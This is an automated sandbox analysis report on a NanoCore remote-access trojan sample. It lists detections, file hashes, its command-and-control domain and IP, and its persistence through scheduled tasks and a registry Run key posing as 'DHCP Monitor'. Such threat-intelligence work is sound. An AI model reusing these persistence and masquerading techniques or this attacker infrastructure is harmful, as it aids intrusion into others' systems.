      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1Scheduled Task/Job1Process Injection212Disable or Modify Tools1Input Capture21System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSystem Information Discovery24SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing41NTDSSecurity Software Discovery131Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol21Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection212DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 384377 Sample: nanocore.exe Startdate: 09/04/2021 Architecture: WINDOWS Score: 100 59 chinomso.duckdns.org 2->59 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 13 other signatures 2->71 9 nanocore.exe 18 2->9         started        14 dhcpmon.exe 16 2->14         started        16 nanocore.exe 16 2->16         started        18 dhcpmon.exe 16 2->18         started        signatures3 process4 dnsIp5 63 192.168.2.1 unknown unknown 9->63 51 C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32 9->51 dropped 75 Detected unpacking (changes PE section rights) 9->75 77 Detected unpacking (overwrites its own PE header) 9->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 9->79 81 Contains functionality to prevent local Windows debugging 9->81 20 nanocore.exe 1 12 9->20         started        53 C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32 14->53 dropped 83 Maps a DLL or memory area into another process 14->83 25 dhcpmon.exe 3 14->25         started        55 C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32 16->55 dropped 27 nanocore.exe 3 16->27         started        57 C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32 18->57 dropped 29 dhcpmon.exe 2 18->29         started        file6 signatures7 process8 dnsIp9 61 chinomso.duckdns.org 213.208.152.210, 49740, 49746, 49747 NEXTLAYER-ASAT Austria 20->61 39 C:\Program Files (x86)\...\dhcpmon.exe, PE32 20->39 dropped 41 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 20->41 dropped 43 C:\Users\user\AppData\Local\...\tmp38C1.tmp, XML 20->43 dropped 45 C:\...\dhcpmon.exe:Zone.Identifier, ASCII 20->45 dropped 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->73 31 schtasks.exe 1 20->31         started        33 schtasks.exe 1 20->33         started        47 C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII 25->47 dropped 49 C:\Users\user\AppData\...\nanocore.exe.log, ASCII 27->49 dropped file10 signatures11 process12 process13 35 conhost.exe 31->35         started        37 conhost.exe 33->37         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      nanocore.exe21%VirustotalBrowse
      nanocore.exe34%ReversingLabsWin32.Trojan.Predator

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe34%ReversingLabsWin32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dll24%ReversingLabsWin32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll24%ReversingLabsWin32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll24%ReversingLabsWin32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dll24%ReversingLabsWin32.Trojan.Predator

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      11.2.dhcpmon.exe.4920000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      13.2.dhcpmon.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      10.2.nanocore.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      10.2.nanocore.exe.49c0000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.2.nanocore.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.2.nanocore.exe.4a90000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      13.2.dhcpmon.exe.4fa0000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.2.nanocore.exe.58b0000.12.unpack100%AviraTR/NanoCore.fadteDownload File
      2.1.nanocore.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      1.2.nanocore.exe.6fc70000.6.unpack100%AviraHEUR/AGEN.1131513Download File
      8.2.nanocore.exe.6eec0000.6.unpack100%AviraHEUR/AGEN.1131513Download File
      9.2.dhcpmon.exe.6eda0000.6.unpack100%AviraHEUR/AGEN.1131513Download File
      11.1.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      12.2.dhcpmon.exe.6f650000.6.unpack100%AviraHEUR/AGEN.1131513Download File
      11.2.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      10.1.nanocore.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      13.1.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      SourceDetectionScannerLabelLink
      chinomso.duckdns.org9%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      chinomso.duckdns.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      chinomso.duckdns.org
      		213.208.152.210
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      chinomso.duckdns.orgtrue
      • Avira URL Cloud: safe
      		unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      213.208.152.210
      		chinomso.duckdns.orgAustria
      		1764NEXTLAYER-ASATtrue

      Private

      IP
      192.168.2.1

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:384377
      Start date:09.04.2021
      Start time:01:07:10
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 3s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:nanocore.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:28
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@18/20@24/2
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 11.1% (good quality ratio 10.2%)
      • Quality average: 76.5%
      • Quality standard deviation: 31.4%
      HCA Information:
      • Successful, ratio: 96%
      • Number of executed functions: 210
      • Number of non-executed functions: 108
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .exe
      Warnings:
      Show All
      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 40.88.32.150, 23.54.113.45, 23.54.113.53, 104.43.139.144, 168.61.161.212, 13.64.90.137, 52.255.188.83, 20.82.210.154, 23.10.249.26, 23.10.249.43, 52.155.217.156, 20.54.26.129
      • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      01:08:01Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\Desktop\nanocore.exe" s>$(Arg0)
      01:08:01API Interceptor1034x Sleep call for process: nanocore.exe modified
      01:08:02Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
      01:08:04AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      213.208.152.210TNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
        Uv8hwOAKgm.exeGet hashmaliciousBrowse

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          chinomso.duckdns.orgTNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
          • 213.208.152.210
          Uv8hwOAKgm.exeGet hashmaliciousBrowse
          • 213.208.152.210
          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
          • 98.143.144.221
          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
          • 185.150.24.55
          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
          • 185.150.24.55
          PAYMENT COPY.exeGet hashmaliciousBrowse
          • 185.150.24.55
          Ku2bTlXUN4.exeGet hashmaliciousBrowse
          • 197.211.59.64
          PAYMENT COPY.exeGet hashmaliciousBrowse
          • 185.150.24.55
          CHEQUE COPY RECEIPT.exeGet hashmaliciousBrowse
          • 185.150.24.55
          CHEQUE COPY.exeGet hashmaliciousBrowse
          • 185.150.24.55
          PAYMENT COPY RECEIPT.exeGet hashmaliciousBrowse
          • 185.150.24.55
          Shiping Doc BL.exeGet hashmaliciousBrowse
          • 194.5.98.157
          Shiping Doc BL.exeGet hashmaliciousBrowse
          • 194.5.98.157
          Shiping Doc BL.exeGet hashmaliciousBrowse
          • 194.5.98.157
          Shiping Doc BL.exeGet hashmaliciousBrowse
          • 194.5.98.157
          Shiping Doc BL.exeGet hashmaliciousBrowse
          • 194.5.98.157
          Shiping Doc BL.exeGet hashmaliciousBrowse
          • 194.5.98.157
          DHL AWB TRACKING DETAIL.exeGet hashmaliciousBrowse
          • 194.5.98.56
          odou7cg844.exeGet hashmaliciousBrowse
          • 129.205.124.145
          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
          • 185.244.30.86

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          NEXTLAYER-ASATTNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
          • 213.208.152.210
          Uv8hwOAKgm.exeGet hashmaliciousBrowse
          • 213.208.152.210
          index_2021-03-02-12_11.dllGet hashmaliciousBrowse
          • 213.208.134.178
          AI5aGob7HV.dllGet hashmaliciousBrowse
          • 213.208.134.178
          SkQguXQerV.dllGet hashmaliciousBrowse
          • 213.208.134.178
          LVFIZ8uZzp.dllGet hashmaliciousBrowse
          • 213.208.134.178
          Statement as of_03_01_2021.xlsmGet hashmaliciousBrowse
          • 213.208.134.178
          printouts_of_outstanding_as_of_mar_01_2021.xlsmGet hashmaliciousBrowse
          • 213.208.134.178
          A43zoxMv6x.dllGet hashmaliciousBrowse
          • 213.208.134.178
          2rS70o1G3T.dllGet hashmaliciousBrowse
          • 213.208.134.178
          eXeMEWy2CI.dllGet hashmaliciousBrowse
          • 213.208.134.178
          3TWrYtkzly.dllGet hashmaliciousBrowse
          • 213.208.134.178
          Statement_of_Account_as_of_mar_01_2021.xlsmGet hashmaliciousBrowse
          • 213.208.134.178
          index_2021-03-01-17_13.dllGet hashmaliciousBrowse
          • 213.208.134.178
          printouts_of_outstanding_as_of_03_01_2021.xlsmGet hashmaliciousBrowse
          • 213.208.134.178
          DZoj4wicd0.dllGet hashmaliciousBrowse
          • 213.208.134.178
          uwq8T3mqDx.dllGet hashmaliciousBrowse
          • 213.208.134.178
          E2uiGA3X2v.dllGet hashmaliciousBrowse
          • 213.208.134.178
          RjIx2AoDBJ.dllGet hashmaliciousBrowse
          • 213.208.134.178
          v2dw80uF0x.dllGet hashmaliciousBrowse
          • 213.208.134.178

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):321222
          Entropy (8bit):7.952258735347819
          Encrypted:false
          SSDEEP:6144:HdlwCtaK8BqoNWDCANNpFONOXopiTgRXWTZU3qC4XpO5BDiQ2KHeG:/xtaR0oQDCANPYNNpUDJX45BkEeG
          MD5:08803CC817D8B1046A964AF11685B15C
          SHA1:8D76CC9E4E21F90AAA0D2A8E9DD88CCB03349F29
          SHA-256:00343EF156007C41A76ABEBE2B0304AACC7E2B12E0D30EA476ECF8C847A54DFC
          SHA-512:BF548910BE04B74D3A8BF8F058D642DAC070D0CC94CA4EAC04EBC4341967ACFD65E5B64232BE0345994B05A847C7501C122D6F70AEB1FE7121BC8F093028C2F3
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 34%
          Reputation:low
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.......p....@...........................:.............................................Ds........:..............................................................................p...............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...4.9..........p..............@....ndata.......@:..........................rsrc.........:......t..............@..@........................................................................................................................................................................................................................................................................................................................................................
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:true
          Reputation:high, very likely benign file
          Preview: [ZoneTransfer]....ZoneId=0
          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.355304211458859
          Encrypted:false
          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
          MD5:69206D3AF7D6EFD08F4B4726998856D3
          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nanocore.exe.log
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.355304211458859
          Encrypted:false
          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
          MD5:69206D3AF7D6EFD08F4B4726998856D3
          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
          C:\Users\user\AppData\Local\Temp\6tts4zykw681emdi
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:data
          Category:dropped
          Size (bytes):279040
          Entropy (8bit):7.999366542899994
          Encrypted:true
          SSDEEP:6144:BtaK8BqoNWDCANNpFONOXopiTgRXWTZU3qC4XpO5BDiQ2KH5:BtaR0oQDCANPYNNpUDJX45BkE5
          MD5:87317BA0D399E3C709FEE0DD272B7ED2
          SHA1:7A5685DA841B945A6B73BD383D05A83357317296
          SHA-256:96C109DF379172E6953F1E7F38B8C2A638989012662ACDE523BDB7E955F80B68
          SHA-512:8A93D135BD61C1CF00EA7A5E6CCC87BC84C050BE501B3E89829C759463002CFE7B62E52A7C48D1A391BDCF6311014107F8888A81CAFAD4E90B687052389C616C
          Malicious:false
          Reputation:low
          Preview: ..x.].].#..o,s:.'...\.X.,......O...V....'*...%..W\.L..j...j..0+......s2u..;......q>..Q>.R.-...'...h.'/)Z.0....Bc.[.P.).$!p...S...@D.`I?."N7.59@.6&=A#&.......9......,..mmj_.).3.s._4.7..N...L..$.U..k.g..3..#X..........1...i...s.......sD...P...,.g.T..v{A.+.}_:..(2.%.Y.].N...Y.b.,l...^...-jAP@ik.p0l.J{6.K.6.A..>..5...A.$'....lhR 0...pn.+....0.....v..LD....>..a...G.Z.....,..Bh..F.}.pY. b0<......R=.n..{xV.2}..Y.....*h6Y@.._.+K.S%.../...DP..G....4x......t..=..p..Z....oH.mG..g...d..z.v.E.g.%.....w.d......<.....j..j.AH....F.1...lY.oWb.F..............w[...A.J[du.....QK.j.:..,..h;F..H..],.92v..1....PB.V.H..t...4..b.....s.6..3Go...b...U...EF ......H.Q7...s...M).00.f\3 ..i..u..=...p...zp.....H.H..t..]........b.f.\n..H.Q-w..S...6....L....4.'1.u....1..b.....<..2}....@..6..-.....'\..l%.Q.x...^7.x..`.. ....ux.!3[..o<......D...L.>l........}sy....$.|.W....p..$0.sH94..rE.....b..U[.!.....A........j.z.eD...d.O'......".os.}D..oG....1.D...P2~KJ..a..d...u.
          C:\Users\user\AppData\Local\Temp\ks446tcfy17w7jqy3r
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:data
          Category:dropped
          Size (bytes):6661
          Entropy (8bit):7.968813365057691
          Encrypted:false
          SSDEEP:96:vQgv6/j3/PiDWkEusDpXtPYTTHfQk01XYNqHhf3/pQI1opkSuWIxMuOpmAd7g:Y9TNDNtPTGNqHhfRQDNIxSpmsk
          MD5:524E815672556CC3AA17CD643C9A351B
          SHA1:49CF76A2F0F2154A7D81D0800DA2B91F0B470DAA
          SHA-256:0F511CF2EAF33C2F20F912E88EBC0A4421780CDDC561C0AE8512E97EEFDF2A70
          SHA-512:BDCCA0642C4EA27FD4ED06411657EBD2665CF9BBA06FB84DEB68AF6DF387FDD4F932E423006B409B424A45B1B94E6CEEF0CF384F46BF86E181F9FF2298A39D23
          Malicious:false
          Preview: .MlN...P..cN.*....o%.vP..*...9/......m6.!.......T"b......(d..@J.zNL..rVz.....Q.._AAA..?Ry9......e..rXWj..T^t8..&...u..qO.c..eZs3.....Y.LV.X..f>>.......Y.Ke.=..kRE..>.".U.F\.N..hFx.../...m..=kd_".yJ?.... .I.@but5.zFR...L{8.....-..8...7.B.I.JE..p.r;.|.3.6.......0.E.7.EZ..E.]$.{...........p.{.@G4..4...........|FAH..V.N:..D......{U.M..[.u5..$......vlN^..X.H4....%...m[TO..i.o/........pReD%.j.B....+...GYVY..g.A....]R.....9.Q3........vO...H...@b.....R......k_..R.~&E....Q.(Oa..N..I.R..M.,Sa..j.0.^*8.i.....&j..+-...e.Gs0....l^..D..!..P.)#>z.`.`..lb......Z^.h;|..pB`<.X...r.7nK.5u..l.%_%v..J[.1q...s3....q...;h..0*....m.%.......HO..G.0.E....".#.......z[..A.9~C..&...+...0~.yc?.....Y:Fo=..........H.6JR..T@.~(....D}.xNh....._..cOL..MK...=.....s+F...V......@..&..%~..yF..no.6.a!....$7...z..`]....}:...aI_.:...yy..?...L..u...S5..1r...{%..tq..].1.s3.....m..,.\....*...o.II.-EK............e..T.K.\...Xq..UP......".........z..@.\.:`iK...E J\
          C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dll
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L.....n`...........!......................... ...............................`............@.........................0!..T...p".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
          Process:C:\Users\user\Desktop\nanocore.exe
